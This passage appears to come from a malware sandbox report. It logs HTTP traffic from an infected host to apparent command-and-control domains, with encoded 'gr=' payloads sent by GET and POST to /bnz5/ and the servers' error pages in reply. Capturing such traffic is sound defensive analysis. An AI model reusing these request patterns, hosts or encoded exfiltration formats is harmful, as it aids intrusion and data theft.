                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      53192.168.2.549772174.138.177.17380
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:19.095400095 CEST454OUTGET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=4BEdEKurUNEFwkFRegiDBzC7pj7sTtT0kB0gdoDHo+aBzggPclQDQJqF4ehpSB3lBDvuZzIzoYk2h0Zy/GWQSTC2T/c7HqqgmNNGpbvCRxrYpdpNw0fXnMi51aRJIBirrQ== HTTP/1.1
                                                                                                      Host: www.elysiangame.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:03:19.218647003 CEST1289INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1251
                                                                                                      date: Tue, 16 Apr 2024 10:03:19 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) ins
                                                                                                      Apr 16, 2024 12:03:19.218692064 CEST218INData Raw: 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65
                                                                                                      Data Ascii: et;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      54192.168.2.54977391.195.240.11780
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:24.433867931 CEST727OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 71 47 57 71 4b 52 39 63 50 68 6c 78 45 6c 32 55 63 35 41 6d 62 46 70 65 36 33 34 32 6a 31 47 6e 4d 4e 66 75 78 76 77 4a 57 6b 46 2b 49 6b 6b 6a 66 76 67 39 52 74 41 67 6b 71 4f 57 6e 59 35 72 68 55 54 2f 63 63 76 78 50 45 62 31 57 2f 55 68 55 31 71 44 48 38 2b 48 37 6d 4d 64 65 38 5a 4c 32 36 41 51 59 30 76 74 68 50 71 34 6a 45 64 31 44 78 63 41 57 48 34 34 55 72 6b 79 31 52 6b 70 44 66 4c 63 33 31 31 74 6e 65 52 4e 6c 72 30 7a 63 6c 5a 65 59 35 4e 43 68 36 6b 6d 6a 4f 4f 49 74 67 50 4f 53 52 52 57 47 68 79 36 6b 36 71 49 54 31 6f 4e 67 51 6c 39 67 58 41 3d
                                                                                                      Data Ascii: gr=U5lbigM/lzYTqGWqKR9cPhlxEl2Uc5AmbFpe6342j1GnMNfuxvwJWkF+Ikkjfvg9RtAgkqOWnY5rhUT/ccvxPEb1W/UhU1qDH8+H7mMde8ZL26AQY0vthPq4jEd1DxcAWH44Urky1RkpDfLc311tneRNlr0zclZeY5NCh6kmjOOItgPOSRRWGhy6k6qIT1oNgQl9gXA=
                                                                                                      Apr 16, 2024 12:03:24.647996902 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:24 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      55192.168.2.54977491.195.240.11780
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:27.167047024 CEST747OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 37 53 53 71 4e 32 68 63 4f 42 6c 79 64 56 32 55 46 4a 41 69 62 46 6c 65 36 32 73 6d 6a 47 75 6e 43 49 37 75 77 75 77 4a 56 6b 46 2b 51 55 6b 6d 53 50 67 32 52 74 4e 56 6b 75 47 57 6e 63 52 72 68 55 6a 2f 66 76 33 79 4e 55 62 4e 44 76 55 6e 4c 6c 71 44 48 38 2b 48 37 69 6b 6b 65 38 42 4c 32 4a 59 51 59 57 48 75 6e 2f 71 37 71 6b 64 31 52 42 63 45 57 48 34 4f 55 71 35 64 31 53 63 70 44 61 76 63 30 6b 31 73 73 65 52 4c 34 62 31 4e 52 6e 78 58 52 5a 5a 2b 74 63 68 53 36 49 43 4b 6c 32 69 6b 49 7a 5a 2b 56 42 65 43 30 70 69 2f 43 46 4a 6b 36 7a 31 4e 2b 41 58 52 61 6a 4a 57 4f 78 48 65 56 38 76 63 31 39 6c 51 67 70 69 47
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjGunCI7uwuwJVkF+QUkmSPg2RtNVkuGWncRrhUj/fv3yNUbNDvUnLlqDH8+H7ikke8BL2JYQYWHun/q7qkd1RBcEWH4OUq5d1ScpDavc0k1sseRL4b1NRnxXRZZ+tchS6ICKl2ikIzZ+VBeC0pi/CFJk6z1N+AXRajJWOxHeV8vc19lQgpiG
                                                                                                      Apr 16, 2024 12:03:27.378807068 CEST701INHTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:03:27 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      56192.168.2.54977591.195.240.11780
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Apr 16, 2024 12:03:29.901143074 CEST1764OUTPOST /bnz5/ HTTP/1.1
                                                                                                      Host: www.blueberry-breeze.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.blueberry-breeze.com
                                                                                                      Referer: http://www.blueberry-breeze.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Raw: 67 72 3d 55 35 6c 62 69 67 4d 2f 6c 7a 59 54 37 53 53 71 4e 32 68 63 4f 42 6c 79 64 56 32 55 46 4a 41 69 62 46 6c 65 36 32 73 6d 6a 47 32 6e 43 36 7a 75 2f 74 59 4a 55 6b 46 2b 5a 30 6b 6e 53 50 67 52 52 75 38 64 6b 75 4b 47 6e 61 56 72 68 32 72 2f 58 2b 33 79 45 55 62 4e 42 76 55 69 55 31 71 57 48 36 65 59 37 6d 49 6b 65 38 42 4c 32 4d 55 51 65 45 76 75 38 2f 71 34 6a 45 64 68 44 78 63 73 57 44 55 77 55 71 38 69 30 6a 38 70 44 36 66 63 37 79 42 73 6c 65 52 4a 37 62 31 46 52 6e 73 50 52 59 30 53 74 63 39 38 36 50 47 4b 30 77 66 2f 53 79 67 70 45 77 65 5a 32 72 43 62 62 69 31 48 38 42 70 35 7a 6a 2f 55 66 6a 4d 35 4e 42 79 63 58 39 69 67 67 4c 31 46 68 4d 2f 77 4a 6b 4c 6d 67 6a 78 4c 45 63 47 31 71 31 30 46 34 63 75 62 56 50 70 51 44 6d 62 57 4b 6e 77 79 6a 33 74 69 65 67 53 74 41 55 75 6c 33 4e 58 49 69 35 72 73 69 54 44 75 51 67 4f 72 6f 65 71 4e 45 50 59 56 42 57 63 37 70 46 48 59 46 4e 54 35 57 4f 59 43 73 58 63 36 71 4a 34 4c 68 33 35 4a 53 32 45 47 47 39 30 30 71 64 58 46 74 47 6b 37 6c 64 70 79 41 66 4a 50 59 69 2b 55 37 48 51 64 32 36 38 47 4a 69 6b 72 51 37 4c 30 46 46 70 33 52 6c 4b 79 69 47 30 66 6c 57 53 71 4e 39 76 33 51 31 58 71 56 38 61 30 51 48 68 49 76 30 72 46 69 54 6e 59 31 38 44 74 33 4d 79 72 2f 51 66 50 36 56 34 34 77 55 76 38 32 4d 65 37 73 69 30 5a 70 53 55 50 2b 41 49 70 36 4d 72 66 55 76 73 62 71 70 7a 70 4b 66 36 41 33 46 42 4f 39 41 59 6f 61 43 6f 4b 71 31 2f 62 4f 6a 4b 72 58 39 45 31 61 55 5a 43 2b 78 4a 6d 2b 78 52 61 4d 4c 77 6f 32 69 62 59 6f 65 66 5a 41 75 42 63 56 56 2f 5a 6e 62 63 31 48 2f 37 6b 2b 4d 6a 73 42 38 70 53 79 68 70 59 48 44 5a 64 77 6e 42 30 73 2f 68 63 52 33 62 79 4c 61 4f 64 76 6e 46 46 50 72 72 4f 69 4a 6a 6b 35 32 79 41 33 77 69 33 74 44 46 36 70 4f 32 61 4e 50 34 46 4e 4e 31 35 34 66 35 64 79 78 31 4a 43 4f 79 74 33 6b 78 41 66 67 55 77 62 2f 4f 78 4d 6f 76 61 51 52 6b 69 47 51 6f 6d 7a 39 77 62 45 5a 4d 6f 79 4d 42 67 6a 6e 78 32 7a 52 59 67 42 5a 4c 44 79 4b 73 4a 5a 4b 4e 6d 2f 47 67 61 72 78 45 7a 62 70 33 73 75 61 62 52 4a 73 61 66 72 32 36 71 66 56 42 66 6d 58 6c 4a 50 54 68 68 46 38 63 43 78 55 57 6a 6f 4b 52 69 4b 5a 68 4f 6c 4b 70 39 5a 75 61 30 76 34 4f 34 53 74 73 6f 78 6d 35 37 69 36 4b 73 4b 30 66 74 33 71 6a 52 47 38 70 76 62 55 47 70 52 73 49 30 53 4e 4a 50 61 45 37 68 42 67 78 4a 7a 4d 61 49 33 48 38 42 69 6d 69 2b 31 67 75 37 48 4c 56 47 2f 58 78 32 34 6d 59 2b 59 74 62 2f 7a 46 4a 35 41 4c 36 6b 6a 78 70 56 51 36 47 6d 2b 50 75 61 55 43 56 73 6b 2f 54 42 43 71 6c 50 63 48 30 35 4e 59 78 6c 65 62 31 39 65 4b 65 58 6d 42 79 53 59 79 4b 7a 55 48 4e 38 41 58 61 50 47 37 35 6a 45 48 67 4a 58 41 4d 70 65 43 70 35 49 49 55 77 78 49 55 7a 75 70 59 62 50 44 45 50 2f 77 6b 45 2b 4a 67 56 4c 37 77 49 78 52 79 6c 71 39 35 78 50 6b 46 56 33 44 6e 44 6b 30 46 2f 50 34 62 71 31 6a 6b 6e 6c 56 38 49 4e 74 6c 61 62 34 49 79 6b 69 6a 65 59 51 45 42 43 34 46 64 4a 53 59 56 42 52 61 4f 51 64 61 4b 71 33 35 41 6e 62 2f 31 59 46 4d 58 4d 52 66 77 48 79 38 65 55 63 31 36 62 57 41 44 74 66 42 32 47 32 33 76 32 35 4b 31 55 76 2b 4d 69 6f 75 6e 46 6b 44 6b 50 78 49 59 4e 64 77 45 46 4a 50 45 58 6f 70 61 2b 4c 4d 6f 51 68 67 41 34 50 56 71 74 6d 69 61 37 49 2f 2b 33 65 68 6c 4a 4c 41 2f 35 71 6a 2f 51 77 47 4e 74 4c 78 42 49 44 6f 55 76 46 75 65 6b 41 64 78 58 37 6d 42 61 44 5a 53 66 65 77 47 32 6b 49 46 69 6f 6a 69 4b 69 52 30 38 50 34 57 53 61 36 6c 36 64 31 4c 35 72 6d 43 6c 61 38 4a 59 32 49 2b 48 47 37 4d 58 51 4c 55 32 73 55 30 79 6b 50 6e 58 4d 4c 61 30 59 2b 41 42 35 4e 7a 77 6c 7a 6f 6d 4f 55 64 51 2f 33 58 79 70 79 6d 36 64 64 72 6d 68 70 56 46 54 45 69 55 41 76 4f 44 31 49 73 61 52 2f 6d 48 56 6b 56 53 75 31 4c 52 73 78 6f 66 6c 32 48 39 65 65 70 70 4b 42 52 44 43 66 6f 58 6b 50 53 71 51 3d 3d
                                                                                                      Data Ascii: gr=U5lbigM/lzYT7SSqN2hcOBlydV2UFJAibFle62smjG2nC6zu/tYJUkF+Z0knSPgRRu8dkuKGnaVrh2r/X+3yEUbNBvUiU1qWH6eY7mIke8BL2MUQeEvu8/q4jEdhDxcsWDUwUq8i0j8pD6fc7yBsleRJ7b1FRnsPRY0Stc986PGK0wf/SygpEweZ2rCbbi1H8Bp5zj/UfjM5NBycX9iggL1FhM/wJkLmgjxLEcG1q10F4cubVPpQDmbWKnwyj3tiegStAUul3NXIi5rsiTDuQgOroeqNEPYVBWc7pFHYFNT5WOYCsXc6qJ4Lh35JS2EGG900qdXFtGk7ldpyAfJPYi+U7HQd268GJikrQ7L0FFp3RlKyiG0flWSqN9v3Q1XqV8a0QHhIv0rFiTnY18Dt3Myr/QfP6V44wUv82Me7si0ZpSUP+AIp6MrfUvsbqpzpKf6A3FBO9AYoaCoKq1/bOjKrX9E1aUZC+xJm+xRaMLwo2ibYoefZAuBcVV/Znbc1H/7k+MjsB8pSyhpYHDZdwnB0s/hcR3byLaOdvnFFPrrOiJjk52yA3wi3tDF6pO2aNP4FNN154f5dyx1JCOyt3kxAfgUwb/OxMovaQRkiGQomz9wbEZMoyMBgjnx2zRYgBZLDyKsJZKNm/GgarxEzbp3suabRJsafr26qfVBfmXlJPThhF8cCxUWjoKRiKZhOlKp9Zua0v4O4Stsoxm57i6KsK0ft3qjRG8pvbUGpRsI0SNJPaE7hBgxJzMaI3H8Bimi+1gu7HLVG/Xx24mY+Ytb/zFJ5AL6kjxpVQ6Gm+PuaUCVsk/TBCqlPcH05NYxleb19eKeXmBySYyKzUHN8AXaPG75jEHgJXAMpeCp5IIUwxIUzupYbPDEP/wkE+JgVL7wIxRylq95xPkFV3DnDk0F/P4bq1jknlV8INtlab4IykijeYQEBC4FdJSYVBRaOQdaKq35Anb/1YFMXMRfwHy8eUc16bWADtfB2G23v25K1Uv+MiounFkDkPxIYNdwEFJPEXopa+LMoQhgA4PVqtmia7I/+3ehlJLA/5qj/QwGNtLxBIDoUvFuekAdxX7mBaDZSfewG2kIFiojiKiR08P4WSa6l6d1L5rmCla8JY2I+HG7MXQLU2sU0ykPnXMLa0Y+AB5NzwlzomOUdQ/3Xypym6ddrmhpVFTEiUAvOD1IsaR/mHVkVSu1LRsxofl2H9eeppKBRDCfoXkPSqQ==
